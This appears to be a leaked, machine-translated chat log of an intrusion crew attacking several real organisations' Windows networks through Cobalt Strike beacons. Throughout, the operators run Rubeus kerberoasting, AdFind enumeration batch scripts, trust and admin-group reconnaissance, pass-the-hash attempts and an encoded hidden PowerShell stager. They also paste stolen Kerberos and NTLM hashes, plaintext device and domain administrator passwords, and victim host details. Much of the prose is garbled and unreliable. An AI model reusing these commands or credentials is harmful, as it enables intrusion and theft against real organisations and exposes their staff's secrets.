``What is he doing in the trusts?[ ](https://mediaeveryone.com/group/unf-edu?msg=wYaqe7ar8HXNYkafK) under number 3 the current domain is tripped he only took from it as I see it from the toolchain did he poll the kerbs from all? while he is poking around in other domains? did not poll them with adfind ?xp one dead2003 not five, alive only thiswin 2008
```
beacon> shell ping PHONEBILLING.unfcsd.unf.edu
[*] Tasked beacon to run: ping PHONEBILLING.unfcsd.unf.edu
[+] host called home, sent: 63 bytes
[+] received output:

Pinging PHONEBILLING.unfcsd.unf.edu [139.62.201.87] with 32 bytes of data:
Reply from 139.62.201.87: bytes=32 time<1ms TTL=128
Reply from 139.62.201.87: bytes=32 time<1ms TTL=128
Reply from 139.62.201.87: bytes=32 time<1ms TTL=128
Reply from 139.62.201.87: bytes=32 time<1ms TTL=128

Ping statistics for 139.62.201.87:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

``Thank you+have+extracted``.
/home/user/Desktop/cobalt/Signature_Tools/toolchain/modules/HPE/Rubeus/Rubeus.exe
```
are you sure you have the right file here? uhh here's the Toulchain Invokerberost[ ](https://mediaeveryone.com/group/unf-edu?msg=pQ3pis2485fxQ3AcY) well here's the Toulchain file with your hands ``
[*] cd C:\ProgramData\
[+] host called home, sent: 23 bytes
[-] File /home/user/Desktop/cobalt/Signature_Tools/toolchain/modules/HPE/Rubeus/Rubeus.exe is not a process assembly (.NET EXE)

Please give me the full log with the manual start and the toolchain startup.
```
[*] cd C:\ProgramData\
[+] host called home, sent: 23 bytes
[-] File /home/user/Desktop/cobalt/Signature_Tools/toolchain/modules/HPE/Rubeus/Rubeus.exe is not a process assembly (.NET EXE)

``@user8 did you know you can kerberoast trust domains?
beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/exec-ass/Rubeus.exe kerberoast /ldapfilter:'admincount=1' /format:hashcat /outfile:C:\ProgramData\hashes.txt
[*] Tasked beacon to run .NET program: Rubeus.exe kerberoast /ldapfilter:'admincount=1' /format:hashcat /outfile:C:\ProgramData\hashes.txt
[+] host called home, sent: 318171 bytes
[+] received output:

   ______ _
  (_____ \ | |
   _____) )_ _| |__ _____ _ _ ___
  | __ /| | | | _ \| ___ | | | |/___)
  | | \ \| |_| | |_) ) ____| |_| |___ |
  |_| |_|____/|____/|_____)____/(___/

  v1.5.0


[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Searching the current domain for Kerberoastable users

[X] No users found to Kerberoast!
[*] Roasted hashes written to : C:\ProgramData\hashes.txt
```
```
beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/exec-ass/Rubeus.exe asreproast /format:hashcat /outfile:C:\ProgramData\asrephashes.txt
[*] Tasked beacon to run .NET program: Rubeus.exe asreproast /format:hashcat /outfile:C:\ProgramData\asrephashes.txt
[+] host called home, sent: 318127 bytes
[+] received output:

   ______ _
  (_____ \ | |
   _____) )_ _| |__ _____ _ _ ___
  | __ /| | | | _ \| ___ | | | |/___)
  | | \ \| |_| | |_) ) ____| |_| |___ |
  |_| |_|____/|____/|_____)____/(___/

  v1.5.0


[*] Action: AS-REP roasting

[*] Target Domain : unfcsd.unf.edu

[*] Searching path 'LDAP://doc2.unfcsd.unf.edu/DC=unfcsd,DC=unf,DC=edu' for AS-REP roastable users

[X] No users found to AS-REP roast!
[*] Roasted hashes written to : C:\ProgramData\asrephashes.txt

``GPPP:
```
[RESULT] Username: student
[RESULT] Changed: 2013-11-19 17:00:59
[RESULT] Password: 1510
```
```
[RESULT] Username: Presenter
[RESULT] Changed: 2011-06-27 18:57:56
[RESULT] Password: presenter
```
```
[RESULT] Username: Podium
[RESULT] Changed: 2015-08-21 18:42:19
```
```
[RESULT] Username: student
[RESULT] Changed: 2017-04-07 13:46:59
[RESULT] Username: cislocal
[RESULT] Changed: 2017-04-07 13:47:25
If you don't see cmd then you can't see the output of 7za it works within the parent process cmd7za console app I wonder if on the target machine 7za.exe works in the background or a window appears? otherwise take it and delete it as usual or take the harddack from them if you want to do a silent delete with overwriting) and is it silent?when i clean it, will it ever get deleted? i mean, will it ever get deleted? will it ever get deleted? archive it and take it away)) 505 megabytes of it, it's probably just a fat hell or netschek pshell adFind.bat
adfind.exe -f "(objectcategory=person)" > ad_users.txt
adfind.exe -f "objectcategory=computer" > ad_computers.txt
adfind.exe -f "(objectcategory=organizationalUnit)" > ad_ous.txt
adfind.exe -subnets -f (objectCategory=subnet)> subnets.txt
adfind.exe -f "(objectcategory=group)" > ad_group.txt
adfind.exe -gcb -sc trustdmp > trustdmp.txt
``adfind through the batek startup already, I was looking to finish the sitinfo or not through the type where the shell, execute, etc.dd handy to remove, it came out:
```
C:\ProgramData>adfind.exe -f "(objectcategory=person)" 1>ad_users.txt

AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015
```
and so far is silent
ad_users.txt - 0 bytes ``.
beacon> net domain_trusts
[*] Tasked beacon to run net domain_trusts
[+] host called home, sent: 104513 bytes
[+] received output:
List of domain trusts:

    0: ITSTEST itstest.ad
    1: UNFMAN unf.man
    2: ADROOT unf.edu (Forest tree root) (Direct Outbound) (Direct Inbound)
    3: UNFCSD unfcsd.unf.edu (Forest 2) (Primary Domain) (Native)
``also please net domain_trusts``.
beacon> net domain_controllers
[*] Tasked beacon to run net domain_controllers
[+] host called home, sent: 104518 bytes
[+] received output:
Domain Controllers:

 Server Name IP Address
 ----------- ----------
 DOC1 139.62.200.188
 DOC2 139.62.200.189
 DOC4 139.62.200.191
 DOC3 139.62.200.190
 AZPDDC01 10.249.1.8
 AZPDDC02 10.249.1.9

beacon> net domain
[*] Tasked beacon to run net domain
[+] host called home, sent: 257 bytes
[+] received output:
unfcsd.unf.edu
``DA:
```
Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
Administrator donh donovanf
johns krist mikeh
ServiceAdmin
The command completed successfully.
```
LA:
```
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
CtxAppVCOMAdmin
UNFCSD\Domain Admins
UNFCSD\Nervief
UNFCSD\Server Admins
The command completed successfully.
```

EA:
```
The request will be processed at a domain controller for domain unfcsd.unf.edu.

The group name could not be found.

More help is available by typing NET HELPMSG 2220.
``in private, of course)is it for me? :point_right::point_left:is)what do you say there is a clean coba?) at 21550 stalled and has been standing for about 10 minutespererazhdaya at 21956 stopped :/you have output on a few meters long loading in the coba restart all yet? column last not updated now cobalt itself suspend 3 and kill one in the first is crashed in bacon adfind
the second doesn't give the output work the second + so you have 2 sessions? exit will help, no? i have to kill all jobs at once i can't see the list of jobs even[ ](https://mediaeveryone.com/group/unf-edu?msg=WRkZc2uEaZ4wdmyvw) well this one kills one by one ls while not that pwd in the second session output appeared all jobs at once kill or `jobs -K`?does not work like in the msf `jobkill -K `but the session did come[ ](https://mediaeveryone.com/group/unf-edu?msg=eZuMneNTDBvSMrxDH) here's the second session, will it lag? closed the kmd and it disappeared at one point appeared near the file LockFile still? i called kmd through a shortcut i think just lag hell because the adfind pours in biconna mbd somewhere on fw cut your domainpal and started me to shove their adfind? xd when the bicon receives commands and does not give anything and lags horribly most likely spalili even in bicon does not go silent her ilsona silent her pwd she does not output anything made another session i did a copy through the pkmya no jobs output in the session can not, nothing because i have to use pkma it actually looks like this on the screenshot i made ktrl+a and copyinbicon it prints adfindcockxxxxx` ``
powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBMAFYAWABhADIALwBpAFMAaABMADkAbgBQAHcASwBmAHgAZwBKADAAQgBCAGsAbgBrAG4AdQBLAHQASQAxAFkAQgBNAGUATgB1AEEASABZAE8AZABHAGsAYgBFAGIAYQBOAHgAKwAwAEwAYgBCAGMATwAvADkANwAxAHQAdABJAEoAUABaAHkAZQB5AE8AdABMAHUAUgBrAEwAdgB0AHEAcQA3AFQAcAAwADkAVgBWAHoAUwBVADMARwBrAEoAeABVADQAaQBoAHkANwBpADcAbQBhAEkAeABqAGcATQB1AE4AcgB0ADcAUwBvAE4AbgBJAFMATgAyAGUAQgB0AGoAWgBLADMAaQBJAGIATwBtACsAMgA2AEYATQBVAHgAOQArAGYAdAB6AGMAUwBtAHQAcwA4AFYAdgArAHgAdAArAHUAYQBIAGIAawBwAFEAbQBjAHMAbgB6AEIAQwA1AEsAVQBXAGwAbQA1AHYAYgBtAC8AeABWAEcAcwBUADIAQwByADAARgBkAG8ATAAzADYATQAxAEgAeQBTAFoAMABZACsANgBKAEsANwA0AEkAVQBkAFEATgBmAFIAcwBIAHIANwAvADkAMQBrAGsAcABSAFUARgB5AG4AbABkADYASwBCAEgAaQBHAFAAbABMAGcAbABGAGMATABIAEYALwBjAGYATQBOAG8AdQBoAHUAdgBOAHcAaQBKACsASAArADUATAA2ADgAVgBYAG8AawBYAE4AcgBrAFkAbgBiAHMAMgBNADQARwBkAGkARQBFAEwAdgBzADIAQwBoADIAYgA3AGEAQwBpAFIAUQBRAG4A
``bicon log output please attach with this problemWhy does it do this is not very clearThe output is normal in bicon shortly output hell was downloaded - 150 bytes archive and 0 bytes folder inside only wrote off and livelyanu magic ran the offertoolchain and session hung for 2 minutes already `` ``
https://login.veeam.com/,https://login.veeam.com/auth/realms/veeamsso/protocol/openid-connect/auth,21/12/2020 15:27:42,13253038062778136,londonit@ballymoregroup.com,I ?$??c$C?
``c$c$non-printers didn't exist at all``.
192.0.2.117:445 (platform: 500 version: 4.9 name: PREMIERNEW domain: WORKGROUP)
192.0.2.214:445 (platform: 500 version: 6.1 name: TV-BALLY-S4P10 domain: WORKGROUP)
 
192.168.3.206:445 (platform: 500 version: 2.0 name: KM89B642 domain: KM-NetPrinters)
192.168.3.202:445 (platform: 500 version: 2.0 name: KM8FD05B domain: KM-NetPrinters)
192.168.3.204:445 (platform: 500 version: 2.0 name: KM892613 domain: KM-NetPrinters)
``https://login.veeam.com/tarnold Canary5500``
192.0.2.3:443
192.0.2.3:80
- us
Username : admin
Password : -6&J{*n]e73e]Mm

192.0.2.1:443
192.0.2.1:80
- VMWare ESXi
tried the nasa crescendos
First - Connection to ESXi host timed out
Then - Cannot complete login due to an incorrect user name or password.




192.0.2.213:443
192.0.2.213:80
192.0.2.213:22 (SSH-2.0-OpenSSH_7.9)
- ASRockRack IPMI
web gui system monitoring
Username : admin
Password : admin




192.0.2.248:443
192.0.2.248:80
192.0.2.248:22 (SSH-2.0-mpSSH_0.2.1)
- iLO 4 ProLiant HP, tab "iLO: Bally44Backup-iLO.ballymoregroup.local"
However, the Ping request could not find host Bally44Backup-iLO.ballymoregroup.local. Please check the name and try again.

192.168.3.162:443
192.168.3.162:22 (SSH-2.0-mpSSH_0.2.1)
- iLO 5 ProLiant host is ILOCZ292107HT.ballymoregroup.local
Ping request could not find host ILOCZ292107HT.ballymoregroup.local. Please check the name and try again.



192.168.15.158:80
- IIS Windows Server

192.0.2.99:80
- IIS Windows Server

192.0.2.246:80
- IIS7



192.168.3.202:443
- kyocera printer scanner

192.168.3.207:443
- HP DesignJet T1600 Printer

192.0.2.243:8080
192.0.2.243:443
192.0.2.243:80
- HP DesignJet T2530 PostScript printer

192.168.3.201:443
- printer
hp LaserJet 4200



192.0.2.214:443
192.0.2.214:80
- tab "TV-BALLY-S4P10 - Control Page", link "https://7bj6wypy6p.dattolocal.net/login",
Portal based login is enabled for this device. In order to access this device, you must have a Datto Partner Portal account.
The Portal-Login button redirects to "https://auth.datto.com/login".
Checked YES with domain @, it didn't go through.




192.0.2.27:80
- Schneider Electric is a European multinational company providing energy and automation digital solutions for efficiency and sustainability.
It addresses homes, buildings, data centers, infrastructure and industries, by combining energy technologies, real-time automation, software and services.
No Credits




192.168.3.161:443
- asks for username and password on the fly



10.0.180.254:8080
10.0.180.254:443
- WatchGuard
https://10.0.180.254/sslvpn_logon.shtml




192.168.3.21:443
- VIA Collaboration Hub
With any laptop or mobile device, VIA wireless presentation and collaboration solutions let meeting participants share any size file,
edit documents together in real time, turn the main display into a digital whiteboard, chat with other users, and stream full uninterrupted HD video (up to 1080p60).
Two buttons, Run and Install, both suggest downloading the software











192.0.2.117:22 (SSH-2.0-OpenSSH_5.3)
192.0.2.105:22 (SSH-2.0-dropbear)
192.0.2.71:22 (SSH-2.0-dropbear)
192.0.2.59:22 (SSH-2.0-dropbear)
192.0.2.50:22 (SSH-2.0-dropbear)
192.0.2.48:22 (SSH-2.0-dropbear)
192.0.2.39:22 (SSH-2.0-dropbear)
192.0.2.24:22 (SSH-2.0-dropbear)
192.0.2.15:22 (SSH-2.0-OpenSSH_4.3)
192.0.2.9:22 (SSH-2.0-dropbear)
192.0.2.4:22 (SSH-2.0-dropbear)
192.168.72.100:22 (SSH-2.0-dropbear)
192.168.72.77:22 (SSH-2.0-dropbear)
192.168.72.55:22 (SSH-2.0-dropbear)







192.0.2.250:443
192.0.2.250:80
192.0.2.250:22 (SSH-2.0-OpenSSH_6.2 PKIX)
- did not open, the tab in the browser is called "Document Moved"

192.0.2.242:443
192.0.2.242:80
- failed to open

192.0.2.237:80
- did not open, "TDSi Ethernet to Serial Module" tab

192.0.2.235:443
192.0.2.235:80
- failed to open

192.0.2.234:443
192.0.2.234:80
- did not open
--- Chromium Credential (User: nreid) ---
URL : http://192.0.2.234/wcd/login.cgi
Username :
Password : 1234567812345678

192.0.2.233:443
192.0.2.233:80
- failed to open

192.0.2.232:80
- did not open, "TDSi Ethernet to Serial Module" tab

192.0.2.230:443
192.0.2.230:80
- failed to open

192.0.2.222:443
192.0.2.222:80
- failed to open

192.0.2.219:80
- does not open all the way, "Hewlett Packard" tab, blue panel on the left with the hp logo

192.0.2.191:80
- Hewlett Packard tab
did not open

192.0.2.190:443
192.0.2.190:80
- failed to open

192.0.2.95:8080
- it didn't open

192.168.3.206:443
- failed to open

192.168.3.204:443
- failed to open

192.168.3.130:443
- failed to open

192.168.15.252:80
- did not open, "NETGEAR" tab

192.168.15.251:80
- did not open, "NETGEAR" tab

192.168.15.206:443
192.168.15.206:80
- it didn't open

192.168.15.106:80
- didn't open

192.168.72.200:443
192.168.72.200:80
- it didn't open

192.168.72.158:80
- didn't open

192.0.3.10:80
- it didn't open

10.0.180.4:443
10.0.180.4:80
- did not open
``Entry : g84.p4.webrootcloudav.comhttps://www.webroot.com/us/en```
BALLYMOREGROUP\Administrator K33p1ngIT53cur3!?!?
``I haven't run into this suite in general, it doesn't matter, if there is it must be with doppelgänger averländernen in filtrechek malware alerte in video logger voor voor aletztige logiweb gui monitoring systema voor dezeen nowsoxx voor dezeen, gimme a screenplay`` ``
https://en.wikipedia.org/wiki/Intelligent_Platform_Management_Interface
``Give me a link@tl1 @tl2
Have not encountered IPMI? What is this thing? ``Scanner module is complete````
10.0.180.254:8080
10.0.180.254:443
10.0.180.4:443
10.0.180.4:80
``````
192.0.3.10:80
``````
192.168.72.200:443
192.168.72.200:80
192.168.72.158:80
192.168.72.100:22 (SSH-2.0-dropbear)
192.168.72.77:22 (SSH-2.0-dropbear)
192.168.72.55:22 (SSH-2.0-dropbear)
``````
192.168.15.252:80
192.168.15.251:80
192.168.15.206:443
192.168.15.206:80
192.168.15.158:80
192.168.15.106:80
``````
192.168.3.207:443
192.168.3.206:443
192.168.3.204:443
192.168.3.202:443
192.168.3.201:443
192.168.3.162:443
192.168.3.161:443
192.168.3.130:443
192.168.3.21:443
192.168.3.162:22 (SSH-2.0-mpSSH_0.2.1)
``````
192.0.2.250:443
192.0.2.250:80
192.0.2.248:443
192.0.2.248:80
192.0.2.246:80
192.0.2.243:8080
192.0.2.243:443
192.0.2.243:80
192.0.2.242:443
192.0.2.242:80
192.0.2.237:80
192.0.2.235:443
192.0.2.235:80
192.0.2.234:443
192.0.2.234:80
192.0.2.233:443
192.0.2.233:80
192.0.2.232:80
192.0.2.230:443
192.0.2.230:80
192.0.2.222:443
192.0.2.222:80
192.0.2.219:80
192.0.2.214:443
192.0.2.214:80
192.0.2.213:443
192.0.2.213:80
192.0.2.191:80
192.0.2.190:443
192.0.2.190:80
192.0.2.99:80
192.0.2.95:8080
192.0.2.27:80
192.0.2.3:443
192.0.2.3:80
192.0.2.1:443
192.0.2.1:80
192.0.2.250:22 (SSH-2.0-OpenSSH_6.2 PKIX)
192.0.2.248:22 (SSH-2.0-mpSSH_0.2.1)
192.0.2.213:22 (SSH-2.0-OpenSSH_7.9)
192.0.2.117:22 (SSH-2.0-OpenSSH_5.3)
192.0.2.105:22 (SSH-2.0-dropbear)
192.0.2.71:22 (SSH-2.0-dropbear)
192.0.2.59:22 (SSH-2.0-dropbear)
192.0.2.50:22 (SSH-2.0-dropbear)
192.0.2.48:22 (SSH-2.0-dropbear)
192.0.2.39:22 (SSH-2.0-dropbear)
192.0.2.24:22 (SSH-2.0-dropbear)
192.0.2.15:22 (SSH-2.0-OpenSSH_4.3)
192.0.2.9:22 (SSH-2.0-dropbear)
192.0.2.4:22 (SSH-2.0-dropbear)
``on the forum access is closedDrop user1 everywhere + change the pass in the general resources, his coba will be closed within 2 hoursI thought I was going to the wrong forum)) oops fucked up, already raised) and what domain? It is lying) why? yes, so good that now themselves on the forum do not get) @user1 account on the forum and everywhere else is closed? Maybe less detects than the current active, or additional functionalityI have not looked, it does not develop. The point of it? Another analogue on the empire? Of course I tried different ones. At different ports.Pointed to the inner ipe? Ratnik does not work, no bounce check those 2 softy about which above wrote? Yes, I know, they just do not yet (sessions would ususer1 does not work with us.I have you offlineWhat do you mean where? Where is @user1 @user3?
https://www.youtube.com/watch?v=OvESADFx2eEСхема remote MITM attack on WSUS system
https://www.securitylab.ru/analytics/479780.phpuser9Добрый dayquotqqhintproblemswithcryptamineswasn't scheduledtodaywhat's up?
List of domain trusts:
    0: WINONA winona.rtpco.local (Forest 2) (Direct Outbound)
    1: ALLOY us.alloypolymers.com (Direct Outbound) (Direct Inbound)
    2: RTPCO rtpco.local (Forest tree root) (Primary Domain) (Native)
```

contiguous YES between RTPCO and ALLOY:
```
cancelet
sagert
```
there is no contiguous YES with WINONA there may be contiguous info than you entered the trust you can poke what is left you have data from the trust
Group name Enterprise Admins
Comment Designated administrators of the enterprise
System error 8519 has occurred.

A global group cannot have a cross-domain member.

``````
Get list of DCs in domain 'rtpco.local' from '\\HendDC1.rtpco.local'.
     MNDomain6.rtpco.local [DS] Site: Winona
       HendDC1.rtpco.local [DS] Site: Henderson
         TXDC2.rtpco.local [DS] Site: texas
         TXDC1.rtpco.local [DS] Site: texas
       HendDC2.rtpco.local [DS] Site: Henderson
         VADC2.rtpco.local [DS] Site: VA
         VADC1.rtpco.local [DS] Site: VA
         MXDC2.rtpco.local [DS] Site: Mexico
         MXDC1.rtpco.local [DS] Site: Mexico
      ShenzDC1.rtpco.local [DS] Site: China
       SingDC1.rtpco.local [DS] Site: Singapore
      ShenzDC2.rtpco.local [DS] Site: China
     SuzhouDC1.rtpco.local [DS] Site: Suzhou
     SuzhouDC2.rtpco.local [DS] Site: Suzhou
     FranceDC1.rtpco.local [DS] Site: France
     FranceDC2.rtpco.local [DS] Site: France
    GermanyDC1.rtpco.local [DS] Site: Germany
    GermanyDC2.rtpco.local [DS] Site: Germany
         INDC2.rtpco.local [DS] Site: Indy
     DC1Poland.rtpco.local [DS] Site: Poland
     DC2Poland.rtpco.local [DS] Site: Poland
         NVDC1.rtpco.local [DS] Site: Nevada
      OrangeDC.rtpco.local [DS] Site: Orange
         MNDC2.rtpco.local [PDC] [DS] Site: Winona
       INDYDC1.rtpco.local [DS] Site: Indy
    CrocketDC1.rtpco.local [DS] Site: Crocket
     PolandDC1.rtpco.local [DS] Site: Poland
          OHDC.rtpco.local [DS] Site: Ohio

``````
Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
Administrator arobinsona cancelet
kaseyaservice O365Service sagert
spicescan
``rtpcompany.com dats amaizing joni)eee
beacon> shell dir \\89.0.192.165\C$
[*] Tasked beacon to run: dir \\89.0.192.165\C$
[+] host called home, sent: 52 bytes
[+] received output:
 Volume in drive \89.0.192.165\C$ has no label.
 Volume Serial Number is FC6D-43E6

 Directory of \89.0.192.165$

03/12/2018 03:08 PM 1,523 cdata.log
01/04/2021 10:27 AM <DIR> kworking
08/22/2013 09:52 AM <DIR> PerfLogs
12/26/2020 04:18 PM <DIR> Program Files
05/22/2019 04:39 PM <DIR> Program Files (x86)
01/01/2021 09:00 AM <DIR> Temp
09/19/2018 09:59 AM <DIR> Users
12/26/2020 04:18 PM <DIR> Windows
               1 File(s) 1,523 bytes
               7 Dir(s) 63,537,639,424 bytes free
``Check with the admin on the server skul''.
Global Group memberships *VSA_Admins *Test_Alloy
                             *IT *SQL Server Admins
Well datak you online or not? and the two sessions that I asked respawned again deadspavnas not working with the domain also can not without the token however can not get the list dk and shuffle the point instead of the domain did tokenak came tried the admin hash that above skilja while with waterwaytut how are we doing?eyJhbGciOiJBbv84YQRMDTiIrYp1HblHzkY4iJ+7MGwqZ5VFjl1Q1/wuUY0OPpJ+VQtuKn4/DNHqdqRGjGDrdndM0lerZt+tvD0yNIEttTOcS4/36eyX0SvkooFgk8CGYaDHTnuR+BB5+x+ICvx0dJxlf0mGaICtl9dx9Xr6WOsRIN1Ixjd0ygk=eyJhbGciOiJBAf5E20yt70OMmNh10sDp1R34feUek7970DUVaBlsa2Y9zCZeeRTRQYrFo9pl729+GKuPeB1W0tRpz7F+9i0dVfSlfXs0/LZu4BJUHncfRj4d2SYrh9r+WGHGxpha6qyH0+0jVeHfdGnaxK95dqA9vVPC/K9tfXWwjjYi9ZFYNiGVvZJCtF3DM2ISs/5G5mg73bpEM1+sTf8UOU45cVrdMQ==eyJhbGciOiJBNSK+pEC35G3MCbavdl2lN0uqKkfEndbVkaasNN3rP5htJNR951Eg0aN8zPP0sM6rAPLRB2YNjK0QiqPediRY+L4u15BfphgzTztIq/zHHLujsEA3FHulNBmbkzUrnYkwglnARj8C4lYlX+RRYuCJ7uh9wlFFHISdFwJQ2dB+nhW3FXq3VMH//0FXfdFhIbO+n+VbHFH2hYOThTpAaTCyGGcjdCOGGnBTGaoDW+BEB9rb4suS6kNY2q9U0/CBEQiZeyJhbGciOiJBJ8fEwhsEVQePwXIRnR5rAr4z7NaNygEGtMt+pwpfc+73Oj+BnsvwyYDl/aK5gyFINMs5IXzoyrZc+VrDTuQ97DdErISO4B6CTltk6y2cSWAHGgxNRj7mY3dWpIn04CxNR0x+lVP9lB37IHp6qdEBvg8qJ2abHi9ystHqTTwTLBekZwDGCYlVPRdJ9X7pWGIb7IYQYC5k/47RYA4hA9c6Nb7ChD8lebPlLFl/CEMUZPs=eyJhbGciOiJB6AFtybCBJLIsrVUQBRoI9CcRbU9sFk6nACMwilYcNSjtuWIbp8ahC/cafdjntVg9FORt/n/OvlcIBE/8a7s7 While we're still working on this grid, we can hang and graze again during working hours, when they show up ))[ ](https://mediaeveryone.com/group/sccy-com?msg=5NtMf6XhACe6Q8yyJ) Sure, they have a lot of data there)) it would be cool to get into the network of these guys) probably through a VPN go to several computers that are in Invey and then do not pinged 445 sees? well ping 10.0.0.96 does not pass kakip not pinged?maybe yesVannData is a company that configured them backupsThere's also an odd thing - I hung invey and he caught something like `10.0.0.96 VANNDATA\patykr` but such IP is not pinged, I think, perhaps it's just those outsourcers via vpn or something like that ... no. There's no way to find the IT guys. They are logged in a couple of places but under YES codes, and even chrome is empty under them. The network is small, maybe outsource?
It's necessary in any case: there are the cracks from one NAS, and no cracks from the system that manages backups and one NAS on all machines in the domain: I checked all the files through SauronEye and manually, took off the chrome-dump - found no cracks of interest. Downloaded a backup of the mail IT specialist, there is correspondence on the implementation of backups, but no passwords in the mail.  In addition, the people involved in the correspondence about the backups (2019), now in the AD are absent341 pc.Looking for computers from the same OU as the current username only in routervpn seems to nouchuchat in the beginning - more was. strange as tovhodny point behind the vpn?see himself and the printer 445 see? and i want to do so, but is not pinging nihilo check other machines in this group for admin rights? clearly the system You have a local user admindae and what? i am again dumb? you took off the hell why?i will smb login to check if i find something, maybe from here there are routes to somewhere else, because he can not get a list of DCs, and around no one else no other options? i'll scan the network in large chunks, maybe i'll find someone ... and the rest checked?there's nowhere to put you put the kerbs? there's no one around, i have to jump on the dk, i guess it's LAa needed for the local accounta you did for a specific car the domain is still .pth W08872612198\"Remote Support" 296c19b3d2cb8e8729e5fe27f6cf764a in quotes did you do that? definitely better ``
user : remote support
domain : W08872612198
program : C:\Windows\system32\cmd.exe /c echo 083dd8b28e4 > \.\pipe\f5604a
impers. : no
NTLM : 296c19b3d2cb8e8729e5fe27f6cf764a
  | PID 48836
  | TID 39276
  | LSA Process is now R/W
  | LUID 0 ; 1888192397 (00000000:708b878d)
  \_ msv1_0 - data copy @ 000002A8A21DC080 : OK !
  \_ kerberos -
``It doesn't look like it came out remote?
user : remote
domain : W08872612198
program : C:\Windows\system32\cmd.exe /c echo 6d969cf0c1b > \\.\pipe\36c22c
impers. : no
NTLM : 296c19b3d2cb8e8729e5fe27f6cf764a
  | PID 1112
  | TID 37960
  | LSA Process is now R/W
  | LUID 0 ; 1888127822 (00000000:708a8b4e)
  \_ msv1_0 - data copy @ 000002A8A1FDF650 : OK !
  \_ kerberos -
``I think it worked.'' Try the goo. How do you defeat the gap?
beacon> pth ".\Remote Support" aad3b435b51404eeaad3b435b51404ee:296c19b3d2cb8e8729e5fe27f6cf764a
[-] pth error: argument 'Support' is not an NTLM hash
Why don't you use the remote support account? There's also the LA, I'll try with it...can I put them there?
$krb5tgs$23$*scom$jdossn.local$MSSQLSvc/jdoscom02.jdossn.local:1433*$0A53423CE554B75B986FC90441C524D0$F6574AB286FE26D01E11A4565A47E2869480DED9C4F07730722CB1B24831AD7A24DCB958C0CB512DFA0C2BFBA56008DFCFE106A7CD45E7472B110D33733AF15DF2B0D51B0CF898821F1AB29B1693712EDEF6AA9F63A17DDAC1A333D76AF89DF5B4E1C6CB677B7A3514B4FCAB6F6B938558F88479B2EBE2367520DB73F76A84DB76B0FC8C9AD3305D79A8A2E58735C599E5E96EAEAF7DC261790525CA247E9A11011C1B282E39238790D3D36177908009A4CCCE3DB754CE38D18EB02EA90846DF8433186D5E17ADF646CC96C1C28C1C5FF37DB6807C1967D7950597D62B80471D23D9DC84D781C924CE4225B61D344E96F32BEB92025D9FA6A144014DA1E173E006A724B17B11548A2D47CE0DBD6E7007E3B90A401B1C41050D65A2BF155DC805979D97A29E95C52280C7F68474826AF6050094CF385CADD9C4588F5D07E29C039B82443B94D01D753E9F963BFB89BA6F0DB890C85F4E2DD27377A31D7BF8FA17ED6FEA7B5559CA977117698D818E737AE3907F7A3D9EEC23FBC6A2325ADF7F13417D9BFBBFB0B4EDC9B192FC0AA58BAF942B51343AD3151482B45789C8CB221E6BC0019420CC2DA4616B9590425658F1591F701F43FD23ED60F3CAB1467BBFBF74C3F4BA44B6096E42BB836E5556735CD70F6022BEBFCA1A67BE83D2ED4BD624F8C53CC324EED07061A9BF0BB

``Clear no, but this is YES``$krb5tgs$23$*svc_scomsql_2019$jdossn.local$MSSQLSvc/JDOSCOMDB61B.jdossn.local:1433*$4008BEF79B9FBFEA93486444F7C689FA$6FD6B9B0D97575B673871D574F773B010657441FC05475333EB66EDC0C2BE5D854321ACCACAA71D2E62932B6086C02FDD24424795BFA58C29CAD65170EE433294874E03ED98790269EEB27B5F659BF7E1ACB160621AF53591422E17E2BEF65F60A2FA12396019FB80ED918E72E9DB371436656D66532D90B62B7E0B77908A4F31D72B365EDF057CD6341907784E2F32C6D246C0D14CE00D66B73DA2D9CAC86DE151D8F09D05625F1D7234EC0E9D2C82E4743F18CD7F0B7C8D90E3A31F9F50508F5FECF6DA5FEF687385D0E608426726078CC03DC955E36B20F3CE6D0466411A3F3EFB0E0CD4DC9135D95B776DC280A05706583497741D9688911619E555F41163D0CE2A8B5F897A93212EA5541520806921B66BDBB7AF7A501D841EFB31D5905F8463EBE4C62F79961085BF92F32E05FDE49321458452C39C1355AC1C3D2AED2A67C6F1A2A755EA6264544C1DCF32F3355EB85F02BB526A1E7B86F38A18E994798E983859DAF0AF9E7803CA97CAD4DCEB9504C7AF4AAE124C328A7C16998F108DD54E5FE806A89DA06E46926F28ED096278F964253935BB8C57F90E7E43371300A94793443955E82CCF0F25BE8618A1DA0DDA6F1493004A26BFA663743B03B16AE7CEC0B8294546DB67C149739237771F890C13BEBD90D0C9B2124105D96C043AF50318081736615F728748A1
``Clear no''.
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jason:1003:aad3b435b51404eeaad3b435b51404ee:c06bbf80fa38c366ca3803b9e922bdd4:::
Remote Support:1002:aad3b435b51404eeaad3b435b51404ee:296c19b3d2cb8e8729e5fe27f6cf764a:::
W08872612198:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:039c94e617f2f4dd3651ee3873e640ea:::
``LA
```
Administrator
JDOSSN\Domain Admins
JDOSSN\NDLEADING_All_Users
JDOSSN_DLEADING_Computer_Account_Admins
